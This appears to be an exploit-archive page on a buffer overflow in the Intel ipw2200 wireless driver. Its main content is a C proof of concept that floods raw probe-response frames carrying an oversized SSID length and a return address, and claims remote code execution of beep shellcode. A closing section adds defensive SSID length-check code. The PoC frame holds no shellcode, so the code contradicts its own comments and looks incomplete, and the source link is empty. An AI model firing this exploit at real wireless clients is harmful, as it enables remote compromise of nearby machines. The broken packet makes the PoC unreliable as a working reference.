Intel Centrino ipw2200BG Wireless Driver Buffer Overflow (Exploit)


A buffer overflow vulnerability has been discovered in the Intel Centrino ipw2200 integrated wireless card driver.


The original article can be found at:


/*
 * This is a PoC exploit for Intel Centrino ipw2200 integrated wireless card.
 * Author:
 * Giuseppe Gottardi (aka oveRet) <overet@securitydate.it>
 * Senior Security Engineer at Communication Valley S.p.A.
 * This version of code is only a Proof of Concept stack based exploit that demonstrates
 * the remote code execution on ipw2200 driver. It executes a beep user space shellcode.
 * It only works on XP SP2 ITA and it was only tested with version of
 * IPW2200BG driver.
 * Thanks to Johnny Cache, H D Moore, skape and Barnaby Jack for their papers.
 */

#include <netdb.h>
#include <net/ethernet.h>
#include <netinet/if_ether.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>     /* memset, memcpy */
#include <unistd.h>

//#define DEBUG
#define DEV "wlan0"
#define DELAY 0.1

char wifi_packet[]=
"\x00\x0e\x35\x95\x7b\x45" //DSTMAC
"\x00\x9c" //SSID len
"\x5a\xf0\x54\x80"; //RET address

/* Send wifi_packet as a raw frame on the interface named by dev. */
int send_probe_response(char *dev)
{
        struct sockaddr sa;
        int sockfd;
        int rc;

#ifdef DEBUG
        int i;
        u_char *moe = (u_char *)wifi_packet;
#endif /* DEBUG */

        memset(&sa, 0, sizeof(struct sockaddr));

        sa.sa_family = PF_PACKET;
        memcpy(sa.sa_data, dev, sizeof(sa.sa_data));

#ifdef DEBUG
        /* Hex dump of the frame, 32 bytes per line */
        for (i=0; i<sizeof(wifi_packet) -1; i++, moe++) {
                if (!(i%32)) printf("\n");
                printf("%02x ", *moe);
        }
#endif /* DEBUG */

        if ((sockfd=socket(PF_PACKET, SOCK_PACKET, htons(ETH_P_ALL))) < 0) {
                return -1;
        }

        /* sizeof - 1 leaves out the string literal's terminating NUL */
        if((rc=sendto(sockfd, wifi_packet, sizeof(wifi_packet) -1, 0, &sa, sizeof(sa))) < 0) {
                return -1;
        }

        return rc;
}

int main(int argc, char *argv[])
{
        int rc;

        printf("waiting for beep shellcode execution...\n");

        for (;;) {
                rc = send_probe_response(DEV);
        }

        return 0;
}
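
The packet in the PoC above carries an SSID element whose length byte is 0x9c (156), far beyond the 32-byte maximum that 802.11 allows for an SSID. The following is an added example, not code from the original article or from Intel's driver, of the length checks a frame parser needs before copying an SSID into a fixed buffer; `extract_ssid`, `parse_constructed` and the status names are hypothetical, and the input frames are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IE_SSID      0   /* 802.11 element ID of the SSID element */
#define SSID_MAX_LEN 32  /* longest SSID that 802.11 allows */

enum { IE_OK = 0, IE_NOT_FOUND = -1, IE_TRUNCATED = -2, IE_SSID_TOO_LONG = -3 };

/* Walk the (id, len, value) elements of a beacon/probe response body and copy the SSID
 * into out[SSID_MAX_LEN]; every length from the frame is checked before any copy. */
int extract_ssid(const uint8_t *ies, size_t ies_len,
                 uint8_t out[SSID_MAX_LEN], size_t *out_len)
{
    size_t off = 0;
    while (ies_len - off >= 2) {
        uint8_t id = ies[off], len = ies[off + 1];
        off += 2;
        if (len > ies_len - off)
            return IE_TRUNCATED;         /* claims more bytes than the frame holds */
        if (id == IE_SSID) {
            if (len > SSID_MAX_LEN)
                return IE_SSID_TOO_LONG; /* e.g. a length byte of 0x9c */
            memcpy(out, ies + off, len);
            *out_len = len;
            return IE_OK;
        }
        off += len;
    }
    return off == ies_len ? IE_NOT_FOUND : IE_TRUNCATED;
}

/* Constructed input: one SSID element declaring ssid_len bytes of 'A', of which
 * only `present` bytes are in the buffer. Returns the parser status. */
int parse_constructed(uint8_t ssid_len, uint8_t present)
{
    uint8_t frame[2 + 255], ssid[SSID_MAX_LEN];
    size_t n = 0;
    memset(frame, 'A', sizeof frame);
    frame[0] = IE_SSID; frame[1] = ssid_len;
    return extract_ssid(frame, 2 + (size_t)present, ssid, &n);
}

int main(void)
{
    printf("len 4: %d, len 0x9c: %d, len 0x9c with 4 bytes present: %d\n",
           parse_constructed(4, 4), parse_constructed(0x9c, 0x9c), parse_constructed(0x9c, 4));
    return 0;
}
```

A receiver that applies both checks drops the oversized element before any copy takes place, whether or not the declared bytes are actually present in the frame.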
